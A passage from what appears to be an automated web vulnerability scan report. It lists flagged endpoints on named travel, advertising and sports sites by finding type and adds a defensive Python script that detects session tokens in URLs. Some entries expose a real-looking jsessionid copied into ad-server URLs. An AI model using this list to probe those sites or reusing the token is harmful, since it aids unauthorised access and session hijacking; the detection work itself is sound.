8.108. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 2]

8.109. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 3]

8.110. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 4]

8.111. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 5]

8.112. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 1]

8.113. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 2]

8.114. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 3]

8.115. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 4]

8.116. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 5]

8.117. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 1]

8.118. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 2]

8.119. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 3]

8.120. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 4]

8.121. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 5]

8.122. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 1]

8.123. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 2]

8.124. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 3]

8.125. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 4]

8.126. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 5]

8.127. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 1]

8.128. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 2]

8.129. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 3]

8.130. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 4]

8.131. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 5]

8.132. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 1]

8.133. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 2]

8.134. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 3]

8.135. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 4]

8.136. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 5]

8.137. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 1]

8.138. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 2]

8.139. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 3]

8.140. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 4]

8.141. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 5]

8.142. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 1]

8.143. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 2]

8.144. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 3]

8.145. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 4]

8.146. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 5]

8.147. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 1]

8.148. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 2]

8.149. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 3]

8.150. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 4]

8.151. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 5]

8.152. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 1]

8.153. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 2]

8.154. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 3]

8.155. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 4]

8.156. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 5]

8.157. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 1]

8.158. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 2]

8.159. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 3]

8.160. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 4]

8.161. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 5]

8.162. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 1]

8.163. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 2]

8.164. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 3]

8.165. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 4]

8.166. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 5]

8.167. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 1]

8.168. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 2]

8.169. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 3]

8.170. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 4]

8.171. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 5]

8.172. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 1]

8.173. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 2]

8.174. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 3]

8.175. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 4]

8.176. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 5]

8.177. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 1]

8.178. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 2]

8.179. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 3]

8.180. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 4]

8.181. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 5]

8.182. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 6]

8.183. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 1]

8.184. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 2]

8.185. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 3]

8.186. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 4]

8.187. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 5]

8.188. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 1]

8.189. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 2]

8.190. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 3]

8.191. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 4]

8.192. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 1]

8.193. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 2]

8.194. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 3]

8.195. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 4]

8.196. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 1]

8.197. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 2]

8.198. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 3]

8.199. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 4]

8.200. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 1]

8.201. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 2]

8.202. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 3]

8.203. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 4]

8.204. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 5]

8.205. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 1]

8.206. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 2]

8.207. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 3]

8.208. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 4]

8.209. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 5]

8.210. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 6]

8.211. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif [REST URL parameter 1]

8.212. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]

8.213. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]

8.214. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]

8.215. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 1]

8.216. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 2]

8.217. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 3]

8.218. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 1]

8.219. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 2]

8.220. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 1]

8.221. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 2]

8.222. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 3]

8.223. http://www.nike.com/nikefootball/home/twitterfeed [REST URL parameter 3]

8.224. http://www.tripadvisor.com/Commerce [src parameter]

9. SSL cookie without secure flag set

9.1. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do

9.2. https://go.americanexpress-travel.com/hotel/HotelAvailability.do

9.3. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

9.4. https://secure.mlb.com/resetPassword.do

9.5. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

9.6. https://secure.mlb.com/style/bam.css.jsp

9.7. https://secure.mlb.com/style/nav_2011.jsp

9.8. https://www.hotelplanner.com/Accept/Reserve.cfm

10. Session token in URL

10.1. http://a.intentmedia.net/adServer/impressions

10.2. http://bh.contextweb.com/bh/set.aspx

10.3. http://cert.travelocity.com/___waseq.img

10.4. http://cm.g.doubleclick.net/pixel

10.5. http://cm.g.doubleclick.net/pixel

10.6. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

10.7. http://gcm.chango.com/collector/relator

10.8. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

10.9. http://l.sharethis.com/pview

10.10. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif

10.11. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

10.12. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

10.13. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard

10.14. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard

10.15. http://rs.gwallet.com/r1/pixel/x1743

10.16. http://travel.travelocity.com/___waseq.img

10.17. http://travel.travelocity.com/hotel/HotelAvailability.do

10.18. http://travel.travelocity.com/hotel/HotelDetail.do

10.19. http://travel.travelocity.com/pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html

10.20. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

10.21. http://travel.travelocity.com/pub/gwt/hotel/esf/hotelresultlist.gwt-rpc

10.22. http://travela.priceline.com/hotel/leaveBehindPop.do

10.23. http://travela.priceline.com/hotel/newHotelSearch.do

10.24. http://travela.priceline.com/hotel/searchHotels.do

10.25. http://travela.priceline.com/hotel/searchResults.do

10.26. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard

10.27. http://www.facebook.com/extern/login_status.php

10.28. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp

10.29. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp

10.30. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

10.31. http://www.priceline.com/hotels/lang/en-us/itinerary.asp
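The entries above are what a "session token in URL" finding looks like in practice: a servlet container's `;jsessionid=...` path parameter or a session-cookie name carried in the query string, which then lands in browser history, proxy and CDN logs, and the Referer header sent to every third party on the page. The `r1-ads.ace.advertising.com` entries later in this report show the second half of that problem, a Travelocity URL complete with its `jsessionid` copied, double-encoded, into the ad server's `dref=` parameter. The check below is an added example written for this page; it is not the XSS.CX report's or Burp Suite's own logic. The list of parameter names is an assumed heuristic, and every sample URL is constructed. Beyond the basic path and query scan it also percent-decodes parameter values that turn out to be embedded URLs, so a token that reached a tracker inside a referrer copy is reported too.

```python
"""Added example (not from the XSS.CX report or Burp Suite): flag session
tokens carried in URLs, including tokens copied into a third party's
referrer parameter. All sample URLs in __main__ are constructed."""
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed heuristic: parameter names that common frameworks accept as a
# session identifier when it is supplied in the URL instead of a cookie.
SESSION_PARAM_NAMES = {
    "jsessionid", "phpsessid", "asp.net_sessionid", "aspsessionid",
    "cfid", "cftoken", "sessionid", "session_id", "sid",
}

Hit = Tuple[str, str, str]  # (location, parameter name, token value)


def _name_value_pairs(url: str):
    """Yield (location, name, value) for every name=value pair in the URL:
    path segments split on '/' and ';' (catches /x.do;jsessionid=... and
    the /site=.../dref=... style used by some ad servers) and the query."""
    parts = urlsplit(url)
    for segment in re.split(r"[/;]", parts.path):
        if "=" in segment:
            name, value = segment.split("=", 1)
            yield "path", name, value
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        yield "query", name, value


def find_session_tokens(url: str, max_decode: int = 3) -> List[Hit]:
    """Return the session-looking parameters found in url.

    Any parameter value that percent-decodes (up to max_decode rounds, so a
    double-encoded Referer copy is handled) to an absolute http(s) URL is
    scanned recursively; hits found there are prefixed with 'embedded:'."""
    hits: List[Hit] = []
    for where, name, value in _name_value_pairs(url):
        if name.lower() in SESSION_PARAM_NAMES and value:
            hits.append((where, name, value))
        inner = value
        for _ in range(max_decode):
            decoded = unquote(inner)
            if decoded == inner:
                break  # nothing left to decode
            inner = decoded
            if inner.lower().startswith(("http://", "https://")):
                hits.extend(
                    ("embedded:" + w, n, v)
                    for w, n, v in find_session_tokens(inner, max_decode - 1)
                )
                break
    return hits


if __name__ == "__main__":
    samples = [  # constructed, not taken from the report
        "http://app.example.test/hotel/HotelDetail.do;jsessionid=0A1B2C3D?tab=guide",
        "http://app.example.test/index.php?PHPSESSID=deadbeef&lang=en",
        # a tracker pixel handed the previous page as a double-encoded dref=
        "http://ads.example.test/site=1/dref=http%253A%252F%252Fapp.example.test"
        "%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D0A1B2C3D%253Ftab%253Dguide",
        "http://static.example.test/images/logo.gif",
    ]
    for u in samples:
        print(u[:60], "->", find_session_tokens(u) or "clean")
```

Run it over a proxy history export one URL per line and the `embedded:` hits are the ones worth raising first: the application may already strip `jsessionid` from its own links, but a token that was once in a URL is still in every referrer copy a tracker received. The name list is deliberately short; extend it with the application's own session parameter names rather than matching on value entropy, which over-reports on CDN cache-busting hashes like the ones in the static-asset entries of this report.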

11. Password field submitted using GET method

12. ASP.NET ViewState without MAC enabled

13. Cookie scoped to parent domain

13.1. http://api.twitter.com/1/statuses/user_timeline.json

13.2. http://as00.estara.com/fs/rules.php

13.3. https://secure.mlb.com/resetPassword.do

13.4. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

13.5. https://secure.mlb.com/style/bam.css.jsp

13.6. https://secure.mlb.com/style/nav_2011.jsp

13.7. http://travela.priceline.com/hotel/leaveBehindPop.do

13.8. http://travela.priceline.com/hotel/searchHotels.do

13.9. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

13.10. http://www.expedia.com/Details

13.11. http://www.expedia.com/Hotel-Search

13.12. http://www.expedia.com/Hotel-Search-WidgetInitJS

13.13. http://www.expedia.com/Hotels/Offers

13.14. http://www.expedia.com/Hotels/Offers

13.15. http://www.getaroom.com/

13.16. http://www.getaroom.com/browse/market_deals

13.17. http://www.getaroom.com/searches/show

13.18. http://www.getaroom.com/washington-dc

13.19. http://www.priceline.com/QP.asp

13.20. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

13.21. http://www.tripadvisor.com/CheckMore

13.22. http://www.tripadvisor.com/Commerce

13.23. http://www.tripadvisor.com/HotelCheckRates

13.24. http://www.tripadvisor.com/SmartDeals-g1-m11893

13.25. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

13.26. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

13.27. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

13.28. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

13.29. http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

13.30. http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif

13.31. http://a.collective-media.net/adj/cm.guardian/

13.32. http://a.collective-media.net/cmadj/cm.guardian/

13.33. http://a.tribalfusion.com/displayAd.js

13.34. http://a.tribalfusion.com/i.cid

13.35. http://a.tribalfusion.com/j.ad

13.36. http://a.tribalfusion.com/z/i.cid

13.37. http://ad.doubleclick.net/ad/N270.N270.EMEA_StratDev/B3867719.15

13.38. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

13.39. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

13.40. http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49

13.41. http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2

13.42. http://ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

13.43. http://ad.doubleclick.net/adj/gna.en/level2

13.44. http://ad.doubleclick.net/clk

13.45. http://ads.pointroll.com/PortalServe/

13.46. http://ads2.adbrite.com/v0/ad

13.47. http://adserver.teracent.net/tase/ad

13.48. http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php

13.49. http://api.wipmania.com/jsonp

13.50. http://apis.google.com/js/plusone.js

13.51. http://ar.voicefive.com/b/wc_beacon.pli

13.52. http://ar.voicefive.com/bmx3/broker.pli

13.53. http://as.chango.com/links/adunit/1.31759988192e+12

13.54. http://as00.estara.com/fs/ruleaction.php

13.55. http://as00.estara.com/fs/rules.php

13.56. http://asset.userfly.com/users/20826/userfly.js

13.57. http://ats.tumri.net/ats/ats

13.58. http://b.scorecardresearch.com/b

13.59. http://b.scorecardresearch.com/p

13.60. http://b.scorecardresearch.com/r

13.61. http://b.voicefive.com/b

13.62. http://bh.contextweb.com/bh/rtset

13.63. http://bh.contextweb.com/bh/set.aspx

13.64. http://bid.openx.net/json

13.65. http://cas.criteo.com/delivery/admeld_map

13.66. http://clk.atdmt.com/go/352348532/direct

13.67. http://d.agkn.com/iframe!t=1168!

13.68. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

13.69. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

13.70. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

13.71. http://d.xp1.ru4.com/meta

13.72. http://d7.zedo.com/img/bh.gif

13.73. http://ehg-twi.hitbox.com/HG

13.74. http://ehg-twi.hitbox.com/HGct

13.75. http://ff.connextra.com/BlueSquare/selector/client

13.76. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/

13.77. http://i.w55c.net/ping_match.gif

13.78. http://image2.pubmatic.com/AdServer/Pug

13.79. http://images.hotelplanner.com/hotelimages/s/028000/028920A-thumb.jpg

13.80. http://int.teracent.net/tase/int

13.81. http://int.teracent.net/tase/int

13.82. http://leadback.advertising.com/adcedge/lb

13.83. http://leadback.hotwire.db.advertising.com/adcedge/lb

13.84. http://lm.trafficmp.com/clicksense/pixel

13.85. http://loadm.exelator.com/load/

13.86. http://m.xp1.ru4.com/ad

13.87. http://m.xp1.ru4.com/meta

13.88. http://m.xp1.ru4.com/meta

13.89. http://m.xp1.ru4.com/meta

13.90. http://o-va1.wtp101.com/imp

13.91. http://o-va3.wtp101.com/imp

13.92. http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js

13.93. http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js

13.94. http://optimized-by.rubiconproject.com/a/7743/12359/21900-9.js

13.95. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

13.96. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

13.97. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

13.98. http://optimized-by.rubiconproject.com/a/8154/13209/25051-1.js

13.99. http://optimized-by.rubiconproject.com/a/8154/13209/25051-15.js

13.100. http://optimized-by.rubiconproject.com/a/8154/13209/25051-8.js

13.101. http://optimized-by.rubiconproject.com/a/dk.js

13.102. http://pixel.rubiconproject.com/di.php

13.103. http://pixel.rubiconproject.com/tap.php

13.104. http://r.openx.net/set

13.105. http://r.turn.com/r/beacon

13.106. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

13.107. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

13.108. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

13.109. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

13.110. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.111. http://r1-ads.ace.advertising.com/site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.112. http://r1-ads.ace.advertising.com/site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

13.113. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

13.114. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

